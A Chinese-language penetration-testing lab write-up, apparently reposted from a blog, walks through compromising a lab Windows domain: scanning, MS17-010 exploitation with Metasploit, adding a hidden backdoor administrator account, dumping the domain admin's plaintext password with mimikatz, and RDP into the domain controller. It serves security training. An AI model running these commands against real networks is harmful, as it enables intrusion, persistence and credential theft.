一、实验机器
-
域控主机:win2008R2(192.168.15.142)
-
域客户机:win7(192.168.15.143)
-
攻击机:kali(192.168.15.129)
二、实验步骤
主机发现,找到域客户机,命令:nmap -sn 192.168.15.0/24
域客户机IP为192.168.15.143,对其进行端口扫描,命令:masscan --rate=10000 --ports 0-65535 192.168.15.143
可以看到域客户机开启了445端口,我们可以尝试利用MS17-010(永恒之蓝)漏洞来get域客户机的shell。开启msf判断域客户机中是否存在ms17-010漏洞。
永恒之蓝漏洞确实存在,我们进行利用。首先设置好参数
run起来,成功拿到了meterpreter。
whoami之后我们发现自己是system权限
这里有一种方法可以让我们远程连接到域客户机
给域客户机中添加一个用户,用户名为b,密码为:!@#123QWEqwe。命令:net user b !@#123QWEqwe /add
这里还可以添加隐藏的用户,只需要加一个$符号即可,命令:net user d$ !@#123QWEqwe /add
接下来将b用户放到管理员组中,命令:net localgroup administrators b /add
域客户机是开启了3389端口的(没有开的话可以自己开一下),我们可以使用rdesktop命令来连接它,命令:rdesktop 192.168.15.143:3389
这里点击其他用户,使用我们刚才创建的b用户进行登录
在登陆时会挤掉之前在域客户机中登录的cxx用户。
登录成功。我们成功的拿下了域客户机。
只是拿下了域客户机是不够的,我们需要拿下域控,接下来我们看看拿下域控主机的步骤。
首先需要知道域控主机的IP,我们执行命令:net gorup "domain controllers" /domain。可以拿到域控主机的名字。然后ping主机名,可得到IP
可知域控主机的IP为192.168.15.142。再执行命令:net group "domain admins" /domain,可以得知域管理用户名。
域管理用户名为:Administrator。然后我们退出shell,回到meterpreter,执行load mimikatz命令,加载猕猴桃。然后再执行kerberos命令,获取明文密码。
我们获取到了Administrator用户的密码为123.Com。然后我们再连接到域客户机,命令:rdesktop 192.168.15.143:3389,点击其他用户进行登录。
用之前创建的b用户进行登录。
登录成功
然后执行mstsc,在域客户机上远程连接域控主机。
IP是之前获得的
这里选择使用其他用户进行登录
用Administrator :123.Com进行登录
这里点击是
等待一下,即可连级上域控主机。
至此实验完成。撒花撒花。哈哈哈。
作者:通地塔
文章来源:https://blog.csdn.net/qq_43168364
扫描关注乌云安全
觉得不错点个“赞”、“在看”哦
本文始发于微信公众号(乌雲安全):【渗透测试】 一次简单的域渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论